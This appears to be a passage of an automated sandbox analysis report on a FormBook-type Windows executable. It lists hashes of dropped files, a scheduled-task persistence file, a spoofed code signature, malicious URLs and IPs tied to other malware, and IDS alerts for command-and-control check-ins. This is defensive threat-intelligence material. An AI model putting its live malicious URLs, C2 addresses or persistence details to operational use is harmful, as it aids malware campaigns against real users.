	http://cache.netflix.com.sg5.wuush.us.kg/	Get hash	malicious	Unknown	Browse	172.67.179.201
	http://cache.netflix.com.id1.wuush.us.kg/	Get hash	malicious	Unknown	Browse	104.21.72.96
	http://investors.spotify.com.th.wuush.us.kg/	Get hash	malicious	Unknown	Browse	172.67.179.201
VNPT-AS-VNVNPTCorpVN	xZ2Ha9PYPn.elf	Get hash	malicious	Mirai	Browse	113.178.195.43
	WIwTo1UTMq.elf	Get hash	malicious	Mirai	Browse	14.232.223.43
	5oXS6HtbzC.elf	Get hash	malicious	Mirai	Browse	222.254.141.105
	dGHiTqj3AB.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	203.161.42.162
	sh4.elf	Get hash	malicious	Mirai	Browse	14.178.148.115
	LisectAVT_2403002B_137.dll	Get hash	malicious	Trickbot	Browse	14.232.161.45
	stock request.exe	Get hash	malicious	FormBook	Browse	203.161.42.158
	irlsever.doc	Get hash	malicious	FormBook	Browse	203.161.42.162
	yIRn1ZmsQF.elf	Get hash	malicious	Unknown	Browse	113.162.243.185
	chfIV0loR4.elf	Get hash	malicious	Unknown	Browse	123.21.63.188
OVHFR	file.exe	Get hash	malicious	SmokeLoader	Browse	51.77.140.74
	https://riprogramma.consegna.52-47-206-73.cprapid.com/brt/payment.php	Get hash	malicious	Unknown	Browse	217.182.178.233
	hfi47s4wOT.exe	Get hash	malicious	Unknown	Browse	51.77.140.74
	file.exe	Get hash	malicious	SmokeLoader	Browse	51.77.140.74
	new.bat	Get hash	malicious	Unknown	Browse	51.89.199.99
	Aurora.exe	Get hash	malicious	Aurora, Quasar, RedLine, Xmrig	Browse	51.79.71.77
	https://new-sneww-online-nowz-all.azurewebsites.net/?referrer=appmetrica_tracking_id%3D173005530304969909%26ym_tracking_id%3D10094745761516744100	Get hash	malicious	Unknown	Browse	54.36.150.186
	FkJbps6Srrl6lOQ9M_l8dpw2.exe	Get hash	malicious	RedLine	Browse	51.195.145.80
	VvlYJBzLuW.elf	Get hash	malicious	Mirai	Browse	37.59.105.215
	7Y18r(169).exe	Get hash	malicious	CryptOne	Browse	51.81.194.202

Process:	C:\Users\user\Desktop\8SxJ9aYfJ1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TwkYThKVQVaYn.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.3810236212315665
Encrypted:	false
SSDEEP:	48:lylWSU4xympgv4RIoUP7gZ9tK8NPZHUx7u1iMugeC/ZPUyus:lGLHxv2IfLZ2KRH6Oug8s
MD5:	46CFAD7E103735ABA6646E3E9F6012AF
SHA1:	F864D5F42D478A79AF32EAE14B87265DE193A851
SHA-256:	55D9A9F40CF5657C548085C6C2472DF452CF3B1A75515C52F59D8853C5F39E74
SHA-512:	8AE818C136BC9AD5A375BDF9B7688C900C8CBE69A17660D428618259E680F338557E5DFF9897E1414E95E2AB1F5B9792965C20FAB7320648FB0B430C10F81A48
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3mxryp3y.5al.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a00tl3fx.jqt.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ewl4kpeb.24q.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_omi1c0qo.fry.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qw1jfzpe.bhr.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qwr5gksb.tgx.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xmzwvhig.00d.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y0i5n4z3.fh4.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\s822635O8R95

Download File

Process:	C:\Windows\SysWOW64\findstr.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE0B6.tmp

Download File

Process:	C:\Users\user\Desktop\8SxJ9aYfJ1.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1600
Entropy (8bit):	5.112246326943942
Encrypted:	false
SSDEEP:	24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtL3xvn:cge7QYrFdOFzOzN33ODOiDdKrsuT9v
MD5:	859441939246B0F4CBA45C3CFEE59001
SHA1:	22F8BE8D100FE1D7E2CFB0F264F58B9F72299C7B
SHA-256:	2DA403AF4B9899ABBCBE8DB6CA16C6752950B9785BBEEEFFA9CF9EAE89EAE49A
SHA-512:	6010AD0C354CD3505BE7E054B3A678C166674F828A737087B311FE70B3F34189F5E28D27416BFBE9ED9F9C41D903C3DF97D3D1EE409F2209A9453A9C0D185275
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

C:\Users\user\AppData\Local\Temp\tmpF632.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1600
Entropy (8bit):	5.112246326943942
Encrypted:	false
SSDEEP:	24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtL3xvn:cge7QYrFdOFzOzN33ODOiDdKrsuT9v
MD5:	859441939246B0F4CBA45C3CFEE59001
SHA1:	22F8BE8D100FE1D7E2CFB0F264F58B9F72299C7B
SHA-256:	2DA403AF4B9899ABBCBE8DB6CA16C6752950B9785BBEEEFFA9CF9EAE89EAE49A
SHA-512:	6010AD0C354CD3505BE7E054B3A678C166674F828A737087B311FE70B3F34189F5E28D27416BFBE9ED9F9C41D903C3DF97D3D1EE409F2209A9453A9C0D185275
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe

Download File

Process:	C:\Users\user\Desktop\8SxJ9aYfJ1.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	734728
Entropy (8bit):	7.824783666447749
Encrypted:	false
SSDEEP:	12288:+CjcUWH29g95jqSGAMmjgkSC+nC6g+Cg1DIYd96sHoJMDDcyncykR:3cbDPx+nCK2g9MJMHLncB
MD5:	E8B4997FD647C6236E8D6A5460724CEE
SHA1:	BBD63E69C618074FF73B861B1CC19D349DDEFA16
SHA-256:	DC46B790C20E5077FC05879616E9D87ACFDEC0B4D2E2D9E82E5CE666487FDFAF
SHA-512:	7CFA57343A902FD0E70020E4C3C5425D8B90F9A5A3BE0583F95C6D28F0C7FAA6AF317D7887954DBADE40DCE2E5D31E66853FF39128969976A12C40B26CD4A5C4
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0......@......Z.... ........@.. ... ....................... ........@.....................................O........................6........................................................... ............... ..H............text...`.... ....... .............. ..`.rsrc............ ..................@..@.reloc........... ..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\8SxJ9aYfJ1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.824783666447749
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.98% Win32 Executable (generic) a (10002005/4) 49.93% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	8SxJ9aYfJ1.exe
File size:	734'728 bytes
MD5:	e8b4997fd647c6236e8d6a5460724cee
SHA1:	bbd63e69c618074ff73b861b1cc19d349ddefa16
SHA256:	dc46b790c20e5077fc05879616e9d87acfdec0b4d2e2d9e82e5ce666487fdfaf
SHA512:	7cfa57343a902fd0e70020e4c3c5425d8b90f9a5a3be0583f95c6d28f0c7faa6af317d7887954dbade40dce2e5d31e66853ff39128969976a12c40b26cd4a5c4
SSDEEP:	12288:+CjcUWH29g95jqSGAMmjgkSC+nC6g+Cg1DIYd96sHoJMDDcyncykR:3cbDPx+nCK2g9MJMHLncB
TLSH:	3CF423033659CB23C8FBAFB45770E5111BB2A5267870D2DC3CE5A1DE5AC6B9482B5B03
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0......@......Z.... ........@.. ... ....................... ........@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4aa25a
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A1A3A2 [Thu Jul 25 01:00:18 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 01:00:00 09/11/2021 00:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xaa208	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xac000	0x5e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xb0000	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xae000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa8260	0xaa000	bf968405fbeafe0d84ac2c6fdc530325	False	0.9531479779411764	data	7.936528755801335	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xac000	0x5e0	0x2000	cc0711971c748dc3c0c55e16c9c74443	False	0.0858154296875	data	1.0986238144666205	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xae000	0xc	0x2000	c5af151acc4f8cae1abead2ab1c608d5	False	0.0050048828125	data	0.008814852707337104	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xac090	0x350	data			0.43514150943396224
RT_MANIFEST	0xac3f0	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-27T08:06:28.803781+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	62392	80	192.168.2.6	157.7.107.37
2024-07-27T08:07:20.520528+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62407	80	192.168.2.6	3.33.130.190
2024-07-27T08:08:28.863600+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62427	80	192.168.2.6	3.33.130.190
